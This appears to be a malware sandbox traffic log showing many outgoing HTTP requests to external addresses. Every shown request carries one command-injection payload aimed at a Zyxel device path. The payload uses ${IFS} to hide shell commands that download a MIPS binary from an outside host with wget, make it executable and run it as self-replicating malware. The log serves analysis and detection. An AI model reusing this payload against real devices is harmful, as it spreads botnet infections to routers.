                                    Jan 13, 2024 19:02:23.929636955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1885192.168.2.1353118186.27.119.255443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929668903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1886192.168.2.134719091.164.168.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929688931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1887192.168.2.135673892.189.236.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929714918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1888192.168.2.1350306204.97.193.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929744959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1889192.168.2.134942880.134.93.86443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929791927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1890192.168.2.1335252184.207.82.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929826975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1891192.168.2.135183842.199.161.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929862976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1892192.168.2.133829246.22.204.107443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929908991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1893192.168.2.1338280151.23.246.247443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929928064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1894192.168.2.134118666.106.48.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.929980993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1895192.168.2.1359306192.91.201.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930015087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1896192.168.2.135653496.18.248.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930052042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1897192.168.2.1335522164.172.206.66443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930073977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1898192.168.2.1340394107.164.10.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930124044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1899192.168.2.1346100211.142.38.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930166006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1900192.168.2.136080862.190.19.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930181980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1901192.168.2.136052817.133.27.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930233955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1902192.168.2.134025079.192.66.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930248022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1903192.168.2.1349666159.208.194.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930277109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1904192.168.2.134151039.119.94.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930326939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1905192.168.2.136047496.209.206.240443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930351973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1906192.168.2.1356410207.229.73.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930383921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1907192.168.2.135544054.113.20.82443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930444956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1908192.168.2.1360686149.127.206.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930488110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1909192.168.2.1357628136.130.32.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930522919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1910192.168.2.133314469.9.223.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930557013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1911192.168.2.1350426145.148.30.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930592060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1912192.168.2.1344692122.155.131.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930629015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1913192.168.2.134487896.146.59.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930659056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1914192.168.2.133456869.119.78.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930680037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1915192.168.2.1357716119.196.97.155443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930725098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1916192.168.2.134212639.108.49.76443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930754900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1917192.168.2.1340306216.73.141.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930792093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1918192.168.2.133334465.209.126.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930839062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1919192.168.2.135201659.118.71.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930880070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1920192.168.2.1349144141.255.143.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930931091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1921192.168.2.134694427.92.72.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930967093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1922192.168.2.133655813.34.153.115443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.930989981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1923192.168.2.134597071.201.110.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931044102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1924192.168.2.1335112212.251.207.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931076050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1925192.168.2.1356606168.252.12.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931129932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1926192.168.2.1354688198.72.164.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931164980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1927192.168.2.135030049.143.20.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931188107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1928192.168.2.1347266136.111.182.209443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931221962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1929192.168.2.1351462159.153.240.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931267977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1930192.168.2.134130412.179.133.226443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931301117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1931192.168.2.1352422155.45.11.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931360960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1932192.168.2.1336048174.151.168.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931391001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1933192.168.2.1360026176.157.26.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931432962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1934192.168.2.134051061.126.245.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931459904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1935192.168.2.135332269.110.175.214443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931518078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1936192.168.2.136066289.94.241.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931545019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1937192.168.2.1337508220.60.211.207443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931588888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1938192.168.2.133930495.167.115.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931613922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1939192.168.2.133919867.83.213.110443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931634903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1940192.168.2.1346116104.117.235.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931694984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1941192.168.2.1358004141.150.96.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931720018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1942192.168.2.135514697.146.174.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931766987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1943192.168.2.1340386158.124.178.244443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931817055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1944192.168.2.133896083.206.183.57443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931843996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1945192.168.2.1352840122.77.47.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931889057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1946192.168.2.133744836.208.176.148443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:23.931895018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    1947192.168.2.1359558209.216.14.218443
                                    TimestampBytes transferredDirectionData
